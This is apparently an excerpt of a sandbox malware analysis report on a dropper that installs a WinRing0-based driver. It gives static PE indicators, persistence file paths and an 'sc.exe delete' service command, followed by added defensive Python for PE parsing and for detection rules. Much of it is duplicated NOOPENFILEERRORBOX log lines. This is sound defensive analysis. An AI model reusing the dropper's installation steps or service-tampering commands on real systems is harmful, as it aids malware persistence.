Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 12Jh49DCAj.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: 12Jh49DCAj.exe Static file information: File size 2630144 > 1048576
Source: 12Jh49DCAj.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
Source: 12Jh49DCAj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp
Source: 12Jh49DCAj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 12Jh49DCAj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 12Jh49DCAj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 12Jh49DCAj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 12Jh49DCAj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: 12Jh49DCAj.exe Static PE information: section name: .00cfg
Source: jjlazghkkuth.exe.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\12Jh49DCAj.exe Code function: 0_2_00007FF6C5321394 push qword ptr [00007FF6C532B004h]; ret 0_2_00007FF6C5321403
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe Code function: 24_2_00007FF759BF1394 push qword ptr [00007FF759BFB004h]; ret 24_2_00007FF759BF1403
Source: C:\Windows\System32\conhost.exe Code function: 36_2_0000000140001394 push qword ptr [0000000140009004h]; ret 36_2_0000000140001403
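The static PE lines above are mechanical header checks, and two of them deserve a caveat: 0x140000000 is the default link base for 64-bit Windows executables, so "Image base > 0x60000000" fires for essentially every x64 EXE, and `.00cfg` is in practice the Control Flow Guard support section from the MSVC CRT (normally merged into `.rdata` by the linker), a toolchain artifact rather than a malware indicator. The parser below is an added example, not Joe Sandbox code; it re-derives the report's checks (image base, DllCharacteristics flags, raw section size, unusual section names, and the section each data directory lands in) from a PE32+ header. The sample header it builds is constructed to mirror the facts the report states (sections, flags, `.data` raw size 0x277a00, data-directory placement); the RVAs, sizes and the `COMMON_SECTIONS` list are this example's own assumptions.

```python
"""Added example, not Joe Sandbox code: re-derive the report's static PE checks
(image base, DllCharacteristics flags, section names, raw section sizes and the
section each data directory falls in) with a small PE32+ header parser."""
import struct
import sys

# IMAGE_OPTIONAL_HEADER64.DllCharacteristics bits (winnt.h).
DLL_FLAGS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
DATA_DIRS = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG", "ARCHITECTURE",
             "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
# Assumed "ordinary" names; anything else (e.g. .00cfg, the MSVC CRT's CFG support section) is reported.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata", ".edata", ".tls", ".bss"}
DEFAULT_X64_BASE = 0x140000000  # MSVC's default link base for 64-bit EXEs, so "> 0x60000000" is the norm


def parse_pe(data: bytes) -> dict:
    """Read the PE32+ headers; section bodies are never touched."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    opt = e_lfanew + 24                                            # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("not a PE32+ image")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(min(n_dirs, 16))]
    sections = []
    for i in range(nsec):  # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, ...
        name, vsize, va, raw = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, raw))

    def section_of(rva):
        return next((n for n, va, vs, raw in sections if va <= rva < va + max(vs, raw)), None)

    return {"image_base": image_base,
            "dll_characteristics": [n for bit, n in sorted(DLL_FLAGS.items()) if dll_chars & bit],
            "sections": sections,
            "dir_sections": {DATA_DIRS[i]: section_of(rva) for i, (rva, size) in enumerate(dirs) if size}}


def analyze(data: bytes) -> dict:
    """Emit findings phrased like the report's 'Static PE information' lines."""
    pe = parse_pe(data)
    findings = []
    if pe["image_base"] > 0x60000000:
        note = " (default x64 link base; expected, not suspicious)" if pe["image_base"] == DEFAULT_X64_BASE else ""
        findings.append(f"Image base {pe['image_base']:#x} > 0x60000000{note}")
    for name, _va, _vsize, raw in pe["sections"]:
        if raw > 0x100000:
            findings.append(f"Raw size of {name} is bigger than: 0x100000 < {raw:#x}")
        if name not in COMMON_SECTIONS:
            findings.append(f"section name: {name}")
    findings += [f"IMAGE_DIRECTORY_ENTRY_{d} is in: {s}" for d, s in pe["dir_sections"].items()]
    return {**pe, "findings": findings}


def build_sample_pe() -> bytes:
    """Constructed PE32+ header (headers only, not a runnable binary) mirroring the report's facts."""
    sections = [(b".text", 0x1000, 0x6000, 0x6000), (b".rdata", 0x7000, 0x3000, 0x3000),
                (b".data", 0xA000, 0x278000, 0x277A00), (b".00cfg", 0x282000, 0x100, 0x200),
                (b".rsrc", 0x283000, 0x400, 0x400), (b".reloc", 0x284000, 0x300, 0x400)]
    # directory index -> (RVA, size): import/load-config/IAT in .rdata, resources in .rsrc, relocs in .reloc
    dirs = {1: (0x7100, 0x80), 2: (0x283000, 0x400), 5: (0x284000, 0x300), 10: (0x7800, 0x140), 12: (0x7000, 0x100)}
    dos = b"MZ" + bytes(58) + struct.pack("<I", 64)                       # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0x6000, 0x27BA00, 0, 0x1394, 0x1000,
                      0x140000000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x285000, 0x400, 0, 3,
                      0x0020 | 0x0040 | 0x0100 | 0x8000, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *dirs.get(i, (0, 0))) for i in range(16))
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, raw, 0x400, 0, 0, 0, 0, 0x40000040)
                    for n, va, vs, raw in sections)
    return dos + b"PE\0\0" + coff + opt + hdrs


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for line in analyze(blob)["findings"]:
        print(line)
```

Run it with a file path to get the same style of findings for a real x64 binary; with no argument it analyzes the constructed header. Keep the caveat in mind when weighting these lines in triage: the image-base and `.00cfg` findings describe the build, while the oversized `.data` section (over 2.5 MB of initialized data in a 2.6 MB file) is the line worth a second look, since it is where an embedded payload such as the dropped executable and driver would normally live.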

            Persistence and Installation Behavior

Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe File created: C:\Windows\Temp\ovabrjmyzhdo.sys (3 entries: logged once as C:\Windows\TEMP\ovabrjmyzhdo.sys and twice as a dropped file)
Source: C:\Users\user\Desktop\12Jh49DCAj.exe File created: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe (dropped file, 2 entries)
Source: C:\Users\user\Desktop\12Jh49DCAj.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "ODTUTVYC"
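The three lines above describe the installation chain a detection engineer would want to catch on a live host: the sample writes an executable into a randomly named C:\ProgramData subdirectory, that executable writes a kernel driver (the WinRing0-derived .sys referenced earlier) into C:\Windows\Temp, and sc.exe is used to delete a service. The script below is an added example and not part of the report; it runs three rules plus a correlation over constructed Sysmon-style file-create and process-create records modelled on those lines. The event schema, the rule names, the "random-looking name" heuristic and the list of directories where a driver should never be written are all assumptions of this example.

```python
"""Added example, not part of the sandbox report: detection rules run over
constructed Sysmon-style file-create and process-create records, modelled on
the installation chain listed above (random-named dropper in C:\\ProgramData,
a .sys written to C:\\Windows\\Temp by that dropper, and sc.exe deleting a
service). The rule names, thresholds and event schema are this example's own."""
import ntpath
import re

DRIVER_DROP_DIRS = (r"c:\windows\temp", r"c:\users", r"c:\programdata")  # drivers do not belong here
SC_DELETE = re.compile(r'\bsc(?:\.exe)?\s+delete\s+"?([^"\s]+)"?', re.I)
VOWELS = set("aeiou")


def looks_random(name: str) -> bool:
    """Heuristic (this example's assumption, not a Joe Sandbox rule): a lowercase,
    letters-only name of 10+ characters containing a run of 4+ consonants."""
    if len(name) < 10 or not name.isalpha() or not name.islower():
        return False
    run = best = 0
    for ch in name:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best >= 4


def norm(path: str) -> str:
    """Case-insensitive comparison: the report logs the same path as TEMP and Temp."""
    return path.replace("/", "\\").lower()


def check_file_create(ev: dict) -> list:
    findings = []
    target = norm(ev["target"])
    directory, filename = ntpath.split(target)
    if filename.endswith(".sys") and any(directory.startswith(d) for d in DRIVER_DROP_DIRS):
        findings.append({"rule": "driver_in_temp", "image": ev["image"],
                         "detail": f"driver {ev['target']} written outside System32\\drivers"})
    parts = target.split("\\")  # c:, programdata, <dir>, <file>
    if (len(parts) == 4 and parts[1] == "programdata" and filename.endswith(".exe")
            and looks_random(parts[2]) and looks_random(filename[:-4])):
        findings.append({"rule": "random_programdata_exe", "image": ev["image"], "detail": ev["target"]})
    return findings


def check_process_create(ev: dict) -> list:
    findings = []
    m = SC_DELETE.search(ev["cmdline"])
    if m and ntpath.basename(norm(ev["image"])) == "sc.exe":
        findings.append({"rule": "sc_delete", "image": ev.get("parent_image", ev["image"]),
                         "detail": f"service {m.group(1)} deleted via sc.exe"})
    return findings


def scan(events: list) -> list:
    """Apply the rules in stream order and correlate: a dropped executable that then writes a driver."""
    findings, dropped = [], set()
    for ev in events:
        if ev["event"] == "FileCreate":
            new = check_file_create(ev)
            findings.extend(new)
            for f in new:
                if f["rule"] == "random_programdata_exe":
                    dropped.add(norm(ev["target"]))
                elif f["rule"] == "driver_in_temp" and norm(ev["image"]) in dropped:
                    findings.append({"rule": "dropper_chain", "image": ev["image"],
                                     "detail": "executable dropped earlier in this stream installed a driver"})
        elif ev["event"] == "ProcessCreate":
            findings.extend(check_process_create(ev))
    return findings


SAMPLE_EVENTS = [  # constructed records, modelled on the report's file and process lines
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\sc.exe",
     "parent_image": r"C:\Users\user\Desktop\12Jh49DCAj.exe",
     "cmdline": r'C:\Windows\system32\sc.exe delete "ODTUTVYC"'},
    {"event": "FileCreate", "image": r"C:\Users\user\Desktop\12Jh49DCAj.exe",
     "target": r"C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe"},
    {"event": "FileCreate", "image": r"C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe",
     "target": r"C:\Windows\TEMP\ovabrjmyzhdo.sys"},
    # benign noise that must not fire
    {"event": "FileCreate", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\Temp\wuauclt.tmp"},
    {"event": "FileCreate", "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"C:\ProgramData\Microsoft\updater.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\sc.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "sc.exe query wuauserv"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['rule']:24} {f['image']}  {f['detail']}")
```

The correlation is what matters in production: a .sys landing in C:\Windows\Temp or an sc.exe delete alone will produce noise from installers and admin scripts, but a freshly dropped random-named executable that then writes a driver is close to the mining-loader pattern this report documents and is worth an alert on its own. The consonant-run heuristic is deliberately crude; swap in an entropy or dictionary check if your environment has many legitimate ProgramData directories with opaque names.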

            Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (51 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
